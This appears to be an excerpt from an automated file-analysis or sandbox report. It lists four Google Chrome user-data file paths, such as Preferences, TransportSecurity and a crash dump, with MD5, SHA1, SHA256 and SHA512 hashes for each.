C:\Users\Admin\AppData\Local\Google\Chrome\User Data\c8dac569-e533-4984-a268-2585cb028679.tmp
| MD5 | 21c20f8e0e63fb99073a95c4b5d08e6a |
| SHA1 | b60c5893f3aa95a10b0f27dbe2d5d2ad22746d20 |
| SHA256 | 6a0676776962e7657262b2f0d149dc86f1bf5acd53ec06f4c6b37dfb4f869787 |
| SHA512 | 717898c251dac1c2500af859ba22f141777ad57c1aed8140d76fd1388e5932ad8452ad013f86798e39ab13b8fdd713c140b1844202494b8c4e403c553740c5a0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 39a8e2f9cf4eac841a65112e3b78d82d |
| SHA1 | 2559bf54aa33c46d95cc74c9ac07c7a7d41fb92d |
| SHA256 | e1b544da4ec7eecb11d86b99f6528fefa17c639f041e425e8ebdc5497ab13555 |
| SHA512 | 993c2aa8c5d236270507e6f73e27625bfc0f2da6d9716a962292d6b32f078972171ab508a70c3f6c1204a159d082d83715c664bcbe119b736987bc116a4fa4f2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 85b963ef82a967a404cb114b6d42703b |
| SHA1 | 19a6a2f2dab63eefc00bc9f35ad78ac532db911b |
| SHA256 | 80afaf14e6b8c927956b4352a76da54f53cd6ff878a59ca7f14f3a048817fb9a |
| SHA512 | e2c6ea97e7cd23fc6085c2e4b0fce6b1eec88c17f7fee72e78b55d2b03f16cd464226ac08f2eeff1cc221f9dd14777c725c9db0238a8830b8f7f54839619f58e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\ffa54aa1-642a-4df8-8af9-390ed23c4a62.dmp
| MD5 | 06cff0dd76c9b0271d0eb9a28f6761e1 |
| SHA1 | ce1a608d4f2a68906a83d8dd9e23ba04d62b5065 |
| SHA256 | 055f5cd4de26a8498e54d8bd1a0f77705f2e80583d2fa3ea5222a7110dae3b93 |
| SHA512 | ee7016cd484ddab923b0717f3e27c3ff586e15ea38a1c71e4b5d823288914241e502ed7af83d00ecf3a4a3ed7241e228e5284bb727012c1edf7aba9d33879b84 |